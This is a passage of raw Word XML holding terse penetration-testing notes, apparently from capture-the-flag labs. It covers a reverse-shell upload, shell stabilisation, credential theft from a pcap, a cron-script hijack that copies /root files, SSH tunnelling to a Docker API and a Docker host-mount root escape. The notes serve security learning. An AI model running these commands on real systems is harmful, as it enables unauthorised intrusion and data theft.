          <w:ilvl w:val="2"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>upload test .html page file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311677E6" w14:textId="28DECA0F" w:rsidR="002549D1" w:rsidRDefault="002549D1" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>upload reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FA6CC2" w14:textId="0013A87F" w:rsidR="002549D1" w:rsidRDefault="002549D1" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>change port and IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D33CACF" w14:textId="0E2D1FB4" w:rsidR="002549D1" w:rsidRDefault="002549D1" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Stabilize the Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7426013F" w14:textId="32EE3CD0" w:rsidR="002549D1" w:rsidRDefault="002549D1" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>python -c ‘import pty; pty.spawn(“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789FD658" w14:textId="2C0D3A7B" w:rsidR="002549D1" w:rsidRDefault="002549D1" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>export TERM=xterm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1289495E" w14:textId="20BA949B" w:rsidR="002549D1" w:rsidRDefault="002549D1" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>background shell via ctrl+Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E3AFC3" w14:textId="4D523D1D" w:rsidR="002549D1" w:rsidRDefault="002549D1" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">in native shell </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stty raw -echo; fg to enable autocompletes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B062D6" w14:textId="159E947C" w:rsidR="002549D1" w:rsidRDefault="002549D1" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>File Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB307F3" w14:textId="33279CFF" w:rsidR="002549D1" w:rsidRDefault="002549D1" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BEB330" w14:textId="62BA9493" w:rsidR="002549D1" w:rsidRDefault="002549D1" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Getting User Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE2B534" w14:textId="3EC9B3B9" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>files of interest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4A6B68" w14:textId="5B009E8A" w:rsidR="002549D1" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>pcapng files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CF0846" w14:textId="0F445C10" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00885B75">
        <w:t>cp suspicious.pcapng /var/www/html/files/ftp/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8C8104" w14:textId="5258E7B5" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BDFF45" w14:textId="6AF52561" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Follow TCP Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A7DB32" w14:textId="38952B63" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Escalate Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE4D75" w14:textId="5486D5F5" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use stolen credentials via Wireshark TCP stream following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CB0BEB" w14:textId="290EFDED" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Root Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3042D1" w14:textId="5940B0BB" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C8D013" w14:textId="569B61A0" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cronjobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516091B2" w14:textId="4E9E42C2" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>root cronjobs runs a given file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2873F947" w14:textId="3C2494D6" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>this given file modifies a script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626EBA5E" w14:textId="67F14B72" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>this given script can be edited by anyone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE836A5" w14:textId="3955A340" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>allows new shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2564AC96" w14:textId="111C2DDC" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>movement of sensitive data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01181543" w14:textId="538B7625" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28403BA4" w14:textId="26EA0252" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>echo “cp /root/* /home/Lennie; chmod 777 /home/Lennie/*” &gt;&gt; /etc/print.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A67B8E9" w14:textId="52DDE520" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>wait for cronjob to run and complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ABCE39" w14:textId="0A24B086" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>confirm data has been successfully transferred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C94B96E" w14:textId="252246C8" w:rsidR="00885B75" w:rsidRDefault="00885B75" w:rsidP="00885B75">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FFBEED3" w14:textId="02C01E40" w:rsidR="00885B75" w:rsidRDefault="00B665CC" w:rsidP="00885B75">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CouchDB – Insecure DB and RCE via Docker API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F553DC4" w14:textId="5FE75052" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48013B32" w14:textId="4DB91642" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5097BCDD" w14:textId="46B82212" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CouchDB &amp; Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FFF37E" w14:textId="0E98491A" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Web Admin Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033930E2" w14:textId="6C6AE0AD" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>/_utils/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3A35D2" w14:textId="052446A7" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>_all_dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB7181C" w14:textId="67445D9A" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Credential search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C7C386" w14:textId="1E5A6C87" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E023743" w14:textId="79FC2314" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>credential login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DAB844" w14:textId="04AC52AA" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EBF702" w14:textId="0AD12FC5" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1622478D" w14:textId="0EC3003E" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cron jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ED081D" w14:textId="2E4BD28F" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>linpeas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD97B76" w14:textId="30731438" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>.bash_history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DB7838" w14:textId="7C501E7B" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>removal of sudo use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AE49A6" w14:textId="22A868EB" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use of docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CDB206" w14:textId="20FCD73D" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>container image name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED9F7CF" w14:textId="4CAB5273" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6386F4D2" w14:textId="2541A6D5" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>IP addr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A9FDDD" w14:textId="4DEE3991" w:rsidR="00B665CC" w:rsidRDefault="00B665CC" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4723508F" w14:textId="18B22458" w:rsidR="00B665CC" w:rsidRDefault="007A6E65" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId255" w:history="1">
        <w:r w:rsidR="00B665CC" w:rsidRPr="00466E42">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=eGz9DS-aIeY</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D3304A7" w14:textId="763597DF" w:rsidR="00B665CC" w:rsidRDefault="007A6E65" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId256" w:anchor="basic-information" w:history="1">
        <w:r w:rsidR="00B665CC" w:rsidRPr="00466E42">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://book.hacktricks.xyz/pentesting/2375-pentesting-docker#basic-information</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E0A6F83" w14:textId="18D87FC1" w:rsidR="00B665CC" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Fast Docker Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A9BE9E" w14:textId="2561A888" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8B3695" w14:textId="68EE59D6" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF952CB" w14:textId="3F5BC393" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>try port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6AAEA7" w14:textId="7057F674" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7996C4D6" w14:textId="567EC07E" w:rsidR="007665F6" w:rsidRDefault="007A6E65" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId257" w:history="1">
        <w:r w:rsidR="007665F6" w:rsidRPr="00466E42">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.tecmint.com/create-ssh-tunneling-port-forwarding-in-linux/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38E17C6F" w14:textId="072E5519" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ssh user@MACHINEIP -L &lt;port&gt;:&lt;ip&gt;:&lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17834254" w14:textId="2568A418" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId258" w:history="1">
        <w:r w:rsidRPr="00466E42">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>atena@10.10.111.8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -L 2375:127.0.0.1:2375</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6BF553" w14:textId="6D5A38AF" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>login</w:t>
      </w:r>
    </w:p>
